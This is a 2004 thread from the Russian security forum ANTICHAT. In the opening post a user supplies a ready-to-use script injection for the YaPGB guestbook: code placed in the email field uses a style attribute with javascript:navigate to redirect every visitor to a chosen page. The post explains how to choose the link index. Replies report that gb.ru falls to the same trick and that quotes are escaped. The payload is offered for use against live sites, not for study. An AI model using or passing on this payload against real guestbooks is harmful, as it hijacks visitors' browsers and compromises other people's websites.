HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.05.2004, 11:24
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

Эта гостевая не пропускает " ' ,а также не пропускает < >.
Но тем неменее редирекс сделать можно. Для этого отсчитываем какая ссылка по счету у нас будет в homepage.
потом в поле почты вставляем следующий код:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">de@de.de" style=background-image:url(javascript:navigate(document.links[7].hr ef));[/QUOTE]<span id='postcolor'>

в поле HOMEPAGE адрес нашей странички http://antichat.ru

Здесь 7 - это порядковый на страничке (если не получается посчитать можно угадать)

ПОсле чего получаем редирект на АНТИЧАТ

Официальный сайт гостевой http://www.hewop.com/~yapgb/ - но там в демоверсии какой то глюк и они подменяют все точки и разные символы.. из за чего у них ссылки неправильно отображаются. Зато уязвимость есть во всем остальных гостевых найденных в интернете.
 
Ответить с цитированием

  #2  
Старый 14.05.2004, 16:37
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Вот это то что нужно! Многие гостевые можно взломать только таким способом( через htmtl рассматривая ясен), например gb.ru, по мойму то же самое)
 
Ответить с цитированием

  #3  
Старый 14.05.2004, 16:55
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

JazzzSummerMan - поздравляю.. gb.ru действительно так ломается
 
Ответить с цитированием

  #4  
Старый 14.05.2004, 20:20
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

кавычки экранируются...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ